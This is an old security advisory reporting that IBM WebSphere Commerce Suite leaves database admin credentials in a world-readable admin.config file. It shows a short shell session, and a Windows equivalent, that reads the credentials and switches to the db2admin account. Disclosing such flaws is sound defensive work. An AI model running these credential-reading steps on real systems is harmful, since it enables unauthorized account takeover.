Vulnerability

    wcs

Affected

    IBM WCS

Description

    Following  is  based  on  a  Chinansl Security Advisory CSA200013.
    Vulnerable are found to be IBM WCS (Websphere Commerce Suite):

        + Sun OS
        + Sun Solaris
        + Microsoft Windows NT
        + Microsoft Windows 2000
        + HP HP-UX
        + IBM AIX
        + Linux

    Chinansl security team  has found a  security problem in  IBM WCS.
    It  is  possible  that  a  malicious  local user can run arbitrary
    command to get root right.

    IBM  WCS  is  bussiness  suite.   After  install  it, a file named
    admin.config will  be produced.   The user  name and  password  to
    access that suite that connects database will be included in  that
    file.  File access right is  - rwxr-xr-x so local user can  access
    it and run some aibitrary command to get root right.

    Examples for Sun OS 5.7:

        $find admin.config |grep admin.config
        /opt/WebSphere/AppServer/bin/admin.config
        $cd /opt/WebSphere/AppServer/bin/
        $grep dbUser admin.config
        com.ibm.ejs.sm.adminServer.dbUser=db2admin
        $grep dbPassword admin.config
        com.ibm.ejs.sm.adminServer.dbPassword=ibmdb2
        $su - db2admin
        password:ibmdb2
        $id
        uid=db2adminID(db2admin)
        
        Examples for WIN2000:
        d:\waserver\bin\>more admin.config
        com.ibm.ejs.sm.adminServer.dbUser=ad2admin
        com.ibm.ejs.sm.adminServer.dbPassword=ad2admin
        ...

Solution

    Config this product correctly and change permissions (not sure  if
    this breaks anything).